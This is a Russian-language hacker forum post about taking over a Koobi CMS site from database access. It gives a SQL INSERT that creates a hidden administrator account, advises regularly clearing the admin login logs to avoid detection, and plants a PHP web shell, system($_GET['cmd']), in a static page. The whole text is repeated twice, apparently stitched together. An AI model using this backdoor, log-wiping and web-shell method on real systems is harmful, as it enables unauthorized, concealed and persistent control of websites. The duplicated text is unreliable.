otmorozok428
11.12.2007, 16:10
Недавно обнаружил прикольную фичу с добавлением пользователя. В общем, у меня был доступ к базе данных, а ля phpMyAdmin, но в админку CMS проникнуть никак не получалось, поскольку админский пароль был пошифрован md5 и никак не брутился.
Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами
INSERT INTO koobi_user (uid, ugroup, uname, email, pass) VALUES (3, 1, "guest", "guest@gmail.com", "202cb962ac59075b964b07152d234b70");
Здесь uid - уникальный порядковый номер пользователя,
uname - имя пользователя,
ugroup равный 1, указывает на то, что юзер - член группы админов,
email используется для логина, а
pass - это md5-хеш нашего пароля (в данном случае "123").
Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался.
Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать.
После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так
{php}system($_GET['cmd']);{/php} .
Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами
INSERT INTO koobi_user (uid, ugroup, uname, email, pass) VALUES (3, 1, "guest", "guest@gmail.com", "202cb962ac59075b964b07152d234b70");
Здесь uid - уникальный порядковый номер пользователя,
uname - имя пользователя,
ugroup равный 1, указывает на то, что юзер - член группы админов,
email используется для логина, а
pass - это md5-хеш нашего пароля (в данном случае "123").
Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался.
Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать.
После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так
{php}system($_GET['cmd']);{/php} .